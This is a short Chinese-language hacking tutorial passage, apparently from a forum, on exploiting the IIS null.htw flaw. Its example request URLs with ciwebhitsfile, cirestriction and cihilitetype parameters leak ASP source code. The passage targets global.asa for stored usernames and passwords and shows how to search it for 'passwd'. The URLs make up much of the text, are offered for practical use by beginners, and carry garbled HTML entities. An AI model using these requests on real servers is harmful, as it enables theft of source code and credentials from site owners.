那就把/login.asp改成/a/a.asp http://ip/null.htw?ciwebhitsfile=/a.asp "amp;cirestriction="quot;"quot;"amp;cihilitetype=full
http://ip/null.htw?ciwebhitsfile=/Global.asa "amp;cirestriction="quot;"quot;"amp;cihilitetype=full

由于这个漏洞null.htw最大能力也就是泄露源代码
所以最好运用就是泄露global.asa文件,此文件往往带着名字,密码等重要内容.

讲解一下:null.htw 调用了ciwebhitsfile,cirestriction,cihilitetype
处理.其中
ciwebhitsfile 处理文件
cirestriction 查找信息
cihilitetype 格式
(***个人理解^_^***)
上面我们已经了解了 ciwebhitsfile 处理文件应用

下面我们再说说cirestriction运用^_^
相信很多人都不了解这有什嘛用.其实就是懒人用的(像我就是了)^_^
http://ip/null.htw?ciwebhitsfile=/Global.asa "amp;cirestriction=passwd"amp;cihilitetype=full

cirestriction=passwd (从=后面开始)
这样它就会在global.asa查找passwd(有找到会有连接哦^_^)

其实这篇并没有什嘛新技术,但实际操作的确可用.
并稍微讲解了一下ciwebhitsfile cirestriction cihilitetype,便于新手理解.其中请注意了
新手往往省列掉 ,就是说在/*.asp后cirestriction前必须加上
http://ip/null.htw?ciwebhitsfile=/Global.asa "amp;cirestriction="quot;"quot;"amp;cihilitetype=full